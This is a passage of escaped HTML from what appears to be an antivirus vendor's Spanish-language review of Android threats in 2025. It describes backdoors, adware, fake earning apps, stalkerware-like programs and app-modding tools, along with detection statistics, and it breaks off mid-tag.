        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/02_Android.Backdoor.916.origin_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/03_Android.Backdoor.916.origin_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/03_Android.Backdoor.916.origin_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt; engaña a los usuarios al imitar el funcionamiento del antivirus&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Tras instalarse en un dispositivo Android, &lt;a href="https://vms.dr-web.es/search/?q=Android.Backdoor.916.origin&amp;lng=es"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; permite robar la información confidencial y espiar al usuario. Por ejemplo, mediante este backdoor los delincuentes pueden escuchar conversaciones, transmitir vídeo desde la cámara, rastrear la ubicación y sustraer datos de messengers y navegadores. Además, &lt;a href="https://vms.dr-web.es/search/?q=Android.Backdoor.916.origin&amp;lng=es"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; incorpora funcionalidad de keylogger para interceptar el texto introducido, incluidas las contraseñas. Según las estimaciones de nuestros especialistas, este backdoor se utiliza en ataques dirigidos y no está pensado para una propagación masiva. El principal objetivo de los ciberdelincuentes son los empleados de empresas rusas.&lt;/p&gt;

&lt;p&gt;En octubre, Doctor Web &lt;a href="https://news.dr-web.es/show/?i=15076" target="_blank"&gt;publicó&lt;/a&gt; la información sobre el backdoor multifuncional &lt;a href="https://vms.dr-web.es/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=es"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, que nuestros analistas de malware detectaron en versiones modificadas del messenger Telegram X. La principal fuente de su propagación fueron los sitios web maliciosos, a los que las posibles víctimas llegaban a través de publicidad en aplicaciones móviles. En estos sitios se ofrecía a los usuarios instalar Telegram X, supuestamente para buscar pareja para comunicarse y concertar citas. Al mismo tiempo, estos recursos web estaban orientados en mayor medida a residentes de Indonesia y Brasil. No obstante, también detectamos este backdoor en varios catálogos de aplicaciones Android de terceros.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/04_Android.Backdoor.Baohuo.1.origin_website_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/04_Android.Backdoor.Baohuo.1.origin_website_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un ejemplo de un sitio web malicioso desde el cual se descargaba la versión troyana de Telegram X&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Una de las funciones de &lt;a href="https://vms.dr-web.es/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=es"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; es robar los datos confidenciales. Por ejemplo, el malware sustrae el nombre de usuario y la contraseña de la cuenta de Telegram de la víctima, el historial de conversaciones en el messenger, los SMS entrantes, los contactos de la agenda del dispositivo y también es capaz de interceptar el contenido del portapapeles. No obstante, los atacantes no lo utilizan únicamente como aplicación espía. Con ayuda de &lt;a href="https://vms.dr-web.es/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=es"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, pueden administrar de facto la cuenta comprometida y controlar el funcionamiento de Telegram X, modificando su funcionalidad.&lt;/p&gt; 

&lt;p&gt;Así, el backdoor permite añadir y eliminar al usuario de los canales de Telegram de forma no autorizada, unirse a chats en su nombre y ocultar los dispositivos autorizados para su cuenta. Para ejecutar acciones que requieren intervenir en la lógica de funcionamiento de la aplicación se utiliza el framework Xposed. Los ciberdelincuentes controlan el backdoor tanto de la forma tradicional —a través de un servidor C2— como mediante el envío de comandos a través de una base de datos Redis, algo que no se había observado anteriormente en otros malware para el sistema operativo Android.&lt;br /&gt;El número total de dispositivos infectados con &lt;a href="https://vms.dr-web.es/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=es"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; superó los 58.000. Al mismo tiempo, se vieron afectados cerca de 3.000 modelos distintos de smartphones, tabletas, decodificadores de TV e incluso vehículos con ordenadores de a bordo basados en Android.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/05_Android.Backdoor.Baohuo.1.origin_map_ru_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/05_Android.Backdoor.Baohuo.1.origin_map_ru_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Países con mayor número de dispositivos infectados por &lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;Estadísticass&lt;/h3&gt;

&lt;p&gt;Según las estadísticas de detección de Dr.Web Security Space para dispositivos móviles, en 2025 las amenazas más comunes para Android fueron los distintos tipos de malware: los usuarios se enfrentaron a ellos en el 81,11 % de los casos. A continuación, con una cuota del 10,73 %, se situaron las aplicaciones potencialmente peligrosas. El tercer lugar lo ocuparon los programas publicitarios, que se detectaron en el 5,89 % de los casos. La menor actividad correspondió al software no deseado, con un 2,27 % de las detecciones.&lt;/p&gt;

&lt;p&gt;En comparación con el año anterior, aumentó la proporción de malware y de aplicaciones potencialmente peligrosas, mientras que la del software no deseado y publicitario disminuyó.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/06_2025_threat_type_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/06_2025_threat_type_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;&lt;b&gt;Malware&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;Durante varios años, los troyanos publicitarios de la familia &lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; han seguido siendo líderes en número de detecciones de malware. En 2025 la situación no cambió, aunque en los últimos 12 meses su cuota se redujo ligeramente, del 31,95 % al 27,42 %.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/07_Android.HiddenAds_dynamics_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/07_Android.HiddenAds_dynamics_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Estos troyanos muestran publicidad intrusiva en forma de banners a pantalla completa y vídeos. Para dificultar a los usuarios la detección y eliminación del malware de los dispositivos infectados, tras la instalación intentan «ocultarse», por ejemplo, escondiendo o sustituyendo sus iconos en el menú de la pantalla principal.&lt;/p&gt;

&lt;p&gt;El representante más activo de la familia resultó ser &lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.657.origin&lt;/b&gt;, que concentró más de un tercio de las detecciones. Este troyano llamó la atención de nuestros analistas de malware ya en 2024 y desde entonces ha logrado situarse en cabeza. Es una de las múltiples variantes de &lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1994&lt;/b&gt;, un malware conocido desde 2021. También se propagaron varias de sus nuevas versiones, como &lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.666.origin&lt;/b&gt; y &lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.673.origin&lt;/b&gt;. No puede descartarse que con el tiempo también asciendan a las primeras posiciones, como ya ocurrió anteriormente con otras modificaciones de &lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1994&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;A lo largo del año, los usuarios volvieron a encontrarse con la subfamilia &lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, Aegis; no obstante, la proporción de este tipo de malware dentro del total de detecciones de la familia se redujo de forma notable, del 17,37 % al 3,11 %. Estos troyanos se caracterizan, entre otras cosas, por su capacidad para ejecutarse automáticamente tras la instalación. Entre ellos, las variantes más activas fueron &lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds.Aegis&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; y &lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds.Aegis&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds.Aegis&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.8.origin&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;El segundo malware más popular fueron los troyanos publicitarios &lt;a href="https://vms.dr-web.es/search/?q=Android.MobiDash&amp;lng=es"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;, cuya cuota aumentó del 5,38 % en 2024 al 15,64 % en 2025. Entre ellos destacó &lt;a href="https://vms.dr-web.es/search/?q=Android.MobiDash&amp;lng=es"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt;. A continuación se situaron los programas falsos &lt;a href="https://vms.dr-web.es/search/?q=Android.FakeApp&amp;lng=es"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, utilizados con fines fraudulentos y que, en lugar de la funcionalidad prometida, cargan diversos sitios web. Estos representaron el 10,94 % de las detecciones, una cifra inferior a la de 2024, cuando su cuota alcanzó el 18,28 %. Este descenso se debió, entre otros factores, a una menor actividad del troyano &lt;a href="https://vms.dr-web.es/search/?q=Android.FakeApp&amp;lng=es"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;, que, no obstante, sigue siendo el representante más popular de la familia. Su principal función es cargar sitios de casinos en línea.&lt;/p&gt;

&lt;p&gt;La cuota de los troyanos de la familia &lt;a href="https://vms.dr-web.es/search/?q=Android.Spy&amp;lng=es"&gt;&lt;b&gt;Android.Spy&lt;/b&gt;&lt;/a&gt;, que incorporan diversas funciones de espionaje, se redujo del 11,52 % al 3,09 %. Al mismo tiempo, aumentó la actividad de los troyanos bancarios: su proporción sobre el total de detecciones de aplicaciones maliciosas alcanzó el 6,94 %, frente al 6,29 % del año anterior.&lt;/p&gt;

&lt;p&gt;En 2025, el número de detecciones de comprimidores de software aumentó del 5,49 % al 6,01 %. Este tipo de herramientas también puede ser utilizado por los delincuentes para proteger el malware frente a su detección y análisis. Con mayor frecuencia, en los dispositivos protegidos se detectaron programas maliciosos que utilizaban el comprimidor &lt;a href="https://vms.dr-web.es/search/?q=Android.Packed&amp;lng=es"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57146&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;Se propagaron diversas modificaciones maliciosas del messenger WhatsApp. Entre ellas se encontraban versiones (detectadas por Dr.Web como &lt;a href="https://vms.dr-web.es/search/?q=Android.Click&amp;lng=es"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;) que cargaban sitios web sin autorización de las víctimas. Asimismo, se observó un aumento de la actividad de los troyanos multifuncionales de la familia &lt;a href="https://vms.dr-web.es/search/?q=Android.Triada&amp;lng=es"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;, que los atacantes pueden integrar en el firmware de dispositivos Android. Su cuota aumentó del 2,74 % al 7,48 %.&lt;/p&gt;

&lt;p&gt;Las diez aplicaciones Android maliciosas detectadas con mayor frecuencia en 2025:&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/08_2025_malware_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/08_2025_malware_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.657.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4214&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.655.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4213&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.666.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programas troyanos destinados a mostrar publicidad intrusiva. Los representantes de esta familia suelen propagarse haciéndose pasar por aplicaciones inofensivas y, en algunos casos, son instalados en el directorio del sistema por otro malware. Al llegar a los dispositivos Android, estos troyanos publicitarios suelen ocultar su presencia al usuario, por ejemplo, al «esconder» el icono de la aplicación en el menú de la pantalla principal.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Android.MobiDash&amp;lng=es"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Un programa troyano que visualiza publicidad importuna. Es un complemento que los desarrolladores de software incrustan en aplicaciones.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Android.FakeApp&amp;lng=es"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Un programa troyano que carga el sitio web indicado en su configuración. Las modificaciones conocidas de este malware cargan un sitio web de un casino en línea.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Android.Click&amp;lng=es"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de mods maliciosos del messenger WhatsApp que pueden cargar varios sitios web en modo de Segundo plano de forma no autorizada por el usuario. &lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Android.Packed&amp;lng=es"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57146&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de malware comprimido con un ofuscador del código commercial popular. &lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Android.Triada&amp;lng=es"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5847&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección del comprimidor para troyanos de la familia &lt;a href="https://vms.dr-web.es/search/?q=Android.Triada&amp;lng=es"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; destinado para proteger los mismos contra su análisis y detección. Con mayor frecuencia, los malintencionados lo usan junto con los mods maliciosos del messenger Telegram donde estos troyanos están directamente incrustados. &lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;&lt;b&gt;Software no deseado&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;El software no deseado más popular en 2025 volvió a ser el representado por las aplicaciones &lt;a href="https://vms.dr-web.es/search/?q=Program.FakeMoney&amp;lng=es"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;, que concentraron el 51,96 % de las detecciones. Estas aplicaciones proponen a los usuarios realizar algunas tareas a cambio de una recompensa y prometen supuestamente la posibilidad de convertirla posteriormente en dinero real. En la práctica, no se produce ningún pago. Junto con &lt;a href="https://vms.dr-web.es/search/?q=Program.FakeMoney&amp;lng=es"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; también se propagaron otros programas similares, como &lt;a href="https://vms.dr-web.es/search/?q=Program.FakeMoney&amp;lng=es"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14&lt;/b&gt; y &lt;a href="https://vms.dr-web.es/search/?q=Program.FakeMoney&amp;lng=es"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.16&lt;/b&gt;, aunque los usuarios se encontraron con ellos con mucha menos frecuencia.&lt;/p&gt;

&lt;p&gt;En segundo lugar, con un 10,37 %, se situaron las aplicaciones &lt;a href="https://vms.dr-web.es/search/?q=Program.FakeAntiVirus&amp;lng=es"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;, que imitan el funcionamiento de un antivirus y detectan amenazas inexistentes. Para «eliminar» la supuesta infección, ofrecen adquirir la versión completa del software.&lt;/p&gt;

&lt;p&gt;Las aplicaciones &lt;a href="https://vms.dr-web.es/search/?q=Program.CloudInject&amp;lng=es"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;, que se modifican a través del servicio en la nube CloudInject, ocuparon el tercer puesto en cuanto a propagación, con una cuota del 6,41 %. Muy cerca de ellas, en la cuarta posición, se situaron sus variantes detectadas como &lt;a href="https://vms.dr-web.es/search/?q=Program.CloudInject&amp;lng=es"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;, con un 5,08 %. Las modificaciones de estas aplicaciones se realizan directamente en un servidor remoto, y el acceso al servicio lo proporciona la utilidad &lt;a href="https://vms.dr-web.es/search/?q=Tool.CloudInject&amp;lng=es"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;, que actúa únicamente como una interfaz para trabajar con él. Durante la modificación, a las aplicaciones se les añaden permisos de sistema peligrosos y código ofuscado. &lt;/p&gt;

&lt;p&gt;Además, a través del servicio CloudInject, los modders pueden gestionar a distancia las aplicaciones modificadas, por ejemplo, bloquearlas y exigir la introducción de un código para poder seguir utilizándolas.&lt;/p&gt;

&lt;p&gt;En el año 2025 se observó un ligero crecimiento del número de detecciones de algunos programas que pueden ser aplicados para observar a usuarios y controlar su actividad. Para los malintencionados estas herramientas se convierten en software espía. Así, por ejemplo, la parte de la aplicación &lt;a href="https://vms.dr-web.es/search/?q=Program.TrackView&amp;lng=es"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; y su variante &lt;a href="https://vms.dr-web.es/search/?q=Program.TrackView&amp;lng=es"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt; subió del 2,40% al 2,91% y del 0,21% al 0,97% respectivamente. La parte de &lt;a href="https://vms.dr-web.es/search/?q=Program.SecretVideoRecorder&amp;lng=es"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt; subió del 2,03% al 2,56%, y de su modificación &lt;a href="https://vms.dr-web.es/search/?q=Program.SecretVideoRecorder&amp;lng=es"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt; — del 0,90% al 1,02%. El indicador del programa &lt;b&gt;Program.SnoopPhone.1.origin&lt;/b&gt; subió del 0,31% al 1,01%.&lt;/p&gt;

&lt;p&gt;Diez tipos de malware detectados con mayor frecuencia en el año 2025:&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/09_2025_unwanted_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/09_2025_unwanted_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Program.FakeMoney&amp;lng=es"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Program.FakeMoney&amp;lng=es"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de aplicaciones que supuestamente permiten ganar dinero al realizar algunas acciones o tareas. Estos programas simulan la acumulación de recompensas y exigen reunir una cantidad mínima para poder retirar el «dinero ganado». Por lo general, incluyen una lista de sistemas de pago y bancos populares a través de los cuales, supuestamente, sería posible transferir las recompensas. Sin embargo, incluso cuando los usuarios logran acumular la cantidad necesaria para el retiro, los pagos prometidos nunca se realizan. Esta entrada también se utiliza para identificar otro software no deseado basado en el código de este tipo de aplicaciones.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Program.FakeAntiVirus&amp;lng=es"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de adware que imita el funcionamiento de software antivirus. Estos programas pueden informar sobre las amenazas no existentes y engañar a usuarios al requerir la compra de una versión completa.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Program.CloudInject&amp;lng=es"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Program.CloudInject&amp;lng=es"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de aplicaciones Android modificadas mediante el servicio en la nube CloudInject y la utilidad Android homónima (añadida a la base de datos de virus de Dr.Web como &lt;a href="https://vms.dr-web.es/search/?q=Tool.CloudInject&amp;lng=es"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Los programas de este tipo se modifican en un servidor remoto, y el usuario interesado en su alteración (el modder) no controla qué elementos se integran realmente en ellos. Además, las aplicaciones obtienen un conjunto de permisos de sistema peligrosos. Tras la modificación, el modder puede administrarlas a distancia: bloquearlas, mostrar diálogos configurables, rastrear la instalación y desinstalación de otro software, etc.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Program.TrackView&amp;lng=es"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Program.TrackView&amp;lng=es"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de la aplicación que permite supervisar a los usuarios a través de dispositivos en Android. Con este programa los malintencionados pueden detectar la ubicación de los dispositivos objetivo, usar la cámara para grabar vídeos y crear fotos, realizar la escucha a través del micro, crear grabaciones de audio etc.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Program.SecretVideoRecorder&amp;lng=es"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.dr-web.es/search/?q=Program.SecretVideoRecorder&amp;lng=es"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Detección de varias versiones de la aplicación para la grabación de fotos y vídeos en segundo plano a través de las cámaras incrustadas de dispositivos en Android. Este programa puede funcionar sin permiso de usuario, al permitir desactivar las notificaciones sobre la grabación, así como sustituir el icono y la descripción de la aplicación por las falsas. Esta funcionalidad lo convierte en potencialmente peligroso.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Program.SnoopPhone.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programa para supervisar a titulares de dispositivos en Android. Permite leer los SMS, recibir la información sobre las llamadas telefónicas, supervisar la ubicación y realizar la grabación de audio del entorno.&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;&lt;b&gt;Programas potencialmente peligrosos&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;En 2025, el software potencialmente peligroso más popular fue el representado por aplicaciones modificadas mediante la herramienta NP Manager. Se trata de una utilidad para la modificación de aplicaciones que incluye varios módulos destinados para ofuscar y proteger el código, así como para esquivar la verificación de la firma digital tras la modificación. Los delincuentes la utilizan con frecuencia para proteger malware y dificultar su detección por parte de los antivirus. En comparación con 2024, la proporción de este tipo de programas aumentó del 24,52 % al 53,59 %, y ya representaron más de la mitad de todas las detecciones de software potencialmente peligroso. Con mayor frecuencia, en los dispositivos protegidos se encontraban las variantes &lt;b&gt;Tool.NPMod.3&lt;/b&gt; (32,85%), &lt;b&gt;Tool.NPMod.1&lt;/b&gt; (12,61%), &lt;b&gt;Tool.NPMod.1.origin&lt;/b&gt; (3,02%) y &lt;b&gt;Tool.NPMod.4&lt;/b&gt; (2,31%).&lt;/p&gt;

&lt;p&gt;El número de detecciones de &lt;a href="https://vms.dr-web.es/search/?q=Tool.Androlua&amp;lng=es"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt; aumentó del 3,93 % al 8,11 %. Se trata de una serie de frameworks creados para el desarrollo de aplicaciones Android en el lenguaje de programación Lua. Estos requieren numerosos permisos del sistema, incluido el uso del servicio de accesibilidad de Android. Las aplicaciones creadas con su ayuda se basan en scripts Lua que están cifrados y solo se descifran inmediatamente antes de su ejecución. Este tipo de scripts puede resultar potencialmente malicioso.&lt;/p&gt; 

&lt;p&gt;Asimismo, la proporción de aplicaciones modificadas mediante la utilidad &lt;a href="https://vms.dr-web.es/search/?q=Tool.LuckyPatcher&amp;lng=es"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;. Creció del 8,16 % al 10,06 %. Esta herramienta modifica los programas instalados al descargar de Internet los scripts especialmente preparados para ello.&lt;/p&gt;

&lt;p&gt;Al mismo tiempo, la parte de las utilidades &lt;a href="https://vms.dr-web.es/search/?q=Tool.SilentInstaller&amp;lng=es"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt; que permiten iniciar las aplicaciones en Android sin su instalación bajó del 33,10% al 10,55%. Las variantes más populares de la familia en el año 2025 fueron &lt;a href="https://vms.dr-web.es/search/?q=Tool.SilentInstaller&amp;lng=es"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14.origin&lt;/b&gt; (4,66%), &lt;a href="https://vms.dr-web.es/search/?q=Tool.SilentInstaller&amp;lng=es"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.6.origin&lt;/b&gt; (2,07%) y &lt;a href="https://vms.dr-web.es/search/?q=Tool.SilentInstaller&amp;lng=es"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt; (1,88%). Además, del 13,17% al 2,58%, bajó la parte de programas protegidos por el comprimidor &lt;a 